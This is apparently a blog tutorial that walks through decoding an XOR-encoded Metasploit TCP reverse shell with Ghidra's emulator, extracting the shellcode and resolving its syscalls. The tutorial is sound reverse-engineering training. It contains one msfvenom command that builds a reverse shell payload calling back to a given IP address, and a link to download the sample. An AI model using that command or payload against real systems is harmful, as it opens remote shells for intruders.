Unpacking Shellcode with Ghidra Emulator
It is common practice for malware authors to decode and execute payloads in memory to avoid detection and complicate analysis. In this post, I will decode and start analyzing an XOR-encoded Metasploit TCP reverse shell as an example of how to get started, using Ghidra to emulate the payload.
The sample for this post can be downloaded from https://secur3.us/GhidraFiles/payload or can be generated with msfvenom:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=104.236.191.89 -f elf -e x64/xor
The exercise begins by creating a new project in Ghidra and importing the sample file.
Opening the program in CodeBrowser and performing auto-analysis reveals the following listing:
Reading through this listing, we can see that it loads the address of the entry function (0x400078) into RAX and then, with the xor instruction at 0x400093, writes XOR results to a location 0x27 bytes into entry. Adding 0x400078+0x27 brings us to 0x40009f, which Ghidra has already flagged with a RW reference from the xor instruction at 0x400093. The decompiler output shows something similar and indicates that it encountered bad instruction data:
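The address arithmetic above is easy to double-check outside Ghidra. This is a minimal sketch in Python that uses only the two values quoted in the text; the constant and function names are my own labels, not anything Ghidra produces.

```python
# Values taken from the listing discussed above; names are illustrative only.
ENTRY_ADDR = 0x400078      # address of entry, loaded into RAX
XOR_DISPLACEMENT = 0x27    # displacement used by the xor instruction


def first_decoded_address(base: int, displacement: int) -> int:
    """Return the first address the xor instruction writes to."""
    return base + displacement


target = first_decoded_address(ENTRY_ADDR, XOR_DISPLACEMENT)
print(hex(target))  # prints 0x40009f
```

The result matches the address Ghidra flagged, which is also where the breakpoint goes later in the walkthrough.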
The program will run an XOR decoding loop to rewrite the program at runtime. This will transform those bad bytes into valid instructions. With this understanding of the code, we can open the program in the stand-alone Emulator tool and allow it to run the XOR loop by clicking Debugger->Emulate Program in New Trace (or by clicking the emulator icon).
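To make the idea of a self-decoding loop more concrete, here is a rough Python sketch of what such a loop does to the bytes it rewrites. It assumes a fixed key repeated across the encoded region; the 8-byte key and the sample bytes are hypothetical values chosen for illustration and are not taken from the sample.

```python
from itertools import cycle


def xor_decode(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with a repeating key."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


# Hypothetical key and arbitrary bytes, for illustration only.
key = bytes.fromhex("1122334455667788")
original = bytes.fromhex("6a2958996a025f6a015e0f05")

# XOR is its own inverse, so the same routine encodes and decodes.
encoded = xor_decode(original, key)
decoded = xor_decode(encoded, key)
assert decoded == original
```

Because encoding and decoding are the same operation, the bytes that look like bad instruction data before the loop runs become valid instructions once the loop has passed over them.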
The plan from here is to let it run through the decoding loop and then inspect the dynamic listing. Set an SW_EXECUTE breakpoint at 0x40009f to recognize when the loop has completed.
After setting the breakpoint, use the Emulator controls to resume execution (the resume/play icon works) and you should see control reach the breakpoint.
Switching to the Dynamic listing at this point (Window->Listing->Dynamic) shows that the bytes have been re-written.
We can now extract the decoded data into a program segment for independent analysis. This is achieved by highlighting the bytes, right-clicking the selection, and choosing the Extract and Import… option from the context menu.
Notice that the dialogue asks, ‘Please select a language.’ This gives us the opportunity to choose a different language for the extracted code.
I have selected the little-endian 64-bit x86 with gcc, but of course we know that this was not compiled by gcc. Other language selections here may improve or degrade your analysis output.
After clicking OK on this prompt, click Yes to analyze the new segment:
The new segment is now included in the Ghidra project in a subfolder named after the program (payload).
Disassemble this by pressing ‘D’ to reveal the shellcode:
And then in the Decompile view:
The shellcode is using the SYSCALL instruction which is represented in Ghidra’s decompiler output as the generic syscall() instead of resolving to the specific Linux system call invoked. The decompiled view in this case does not contain enough information to understand the deobfuscated code. Fortunately, Ghidra ships with an example script demonstrating how to use a memory overlay to resolve syscall numbers to function placeholders so that we see appropriate names and signatures instead of syscall().
Open Script Manager from the Window menu and search for ‘SyscallsScript’ to find it:
Unfortunately, this script was not designed to be run on a program segment and does not like the available metadata. If you run the script you will get an error as follows:
Right-click the script and open it in the basic editor to apply a quick patch by commenting out the check as shown in the highlighted section below.
After adding the comments, you will need to save the script under a new name before it can be run:
Running the updated script and returning to the decompiled segment output, we see:
I will leave the rest of the analysis to the reader, but we can already see that the four syscalls have been renamed and given appropriate signatures for socket, connect, dup2, and execve, which gives a pretty clear indication of what the shellcode is doing.
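If you want to sanity-check the renamed calls by hand, the lookup is simple enough to sketch in Python. The table below holds only the Linux x86-64 syscall numbers for the four calls named above. It is an illustration of the number-to-name mapping and not a description of how the Ghidra script works internally; the function name is my own.

```python
# Linux x86-64 syscall numbers for the four calls named above.
LINUX_X64_SYSCALLS = {
    33: "dup2",
    41: "socket",
    42: "connect",
    59: "execve",
}


def syscall_name(number: int) -> str:
    """Map the value placed in RAX before SYSCALL to a readable name."""
    # Unknown numbers fall back to a generic placeholder.
    return LINUX_X64_SYSCALLS.get(number, f"syscall_{number:#x}")


for n in (41, 42, 33, 59):
    print(f"{n:#x} -> {syscall_name(n)}")
```

Reading the constant moved into RAX before each SYSCALL instruction in the listing and passing it to syscall_name should give the same names the script applied.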
Join Me At Black Hat To Learn More
As always, I hope you have enjoyed reading this post. If you found this interesting and want to learn more, please consider joining me in Vegas this summer for ‘A Guide to Reversing with Ghidra’. The class is offered twice, Saturday/Sunday and Monday/Tuesday. Spaces are filling up quickly so please reserve your space today!
UPDATE 3/2/24: Registration is currently open for “A Basic Guide to Bug Hunting with Ghidra” at Black Hat USA 2024. The two day class will be offered August 3–4 and again August 5–6.